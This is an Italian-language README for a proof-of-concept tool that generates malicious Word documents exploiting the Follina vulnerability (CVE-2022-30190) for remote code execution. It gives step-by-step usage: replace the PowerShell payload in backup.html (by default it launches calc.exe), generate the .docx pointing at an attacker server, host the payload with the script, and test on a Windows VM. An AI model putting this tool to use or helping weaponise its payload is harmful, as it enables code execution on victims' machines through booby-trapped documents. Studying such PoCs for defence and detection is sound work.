
Generatore di documenti PoC MS-MSDT Follina CVE-2022-30190
Generatore di docx dannosi per sfruttare (Esecuzione di codice remoto in Microsoft Office Word)
La creazione di questo script si basa su CVE-2021-40444 PoC di LockedByte e analisi di Tothi
Prima modifica backup.html e sostituisci il payload di PowerShell. Al momento apre semplicemente calc.exe usando IEX('calc.exe').
python3 exploit.py generate http://<SRV IP>

Una volta generato il docx dannoso (si troverà in out/) puoi impostare il server:
sudo python3 exploit.py host 80

Infine prova il docx in una macchina virtuale Windows:
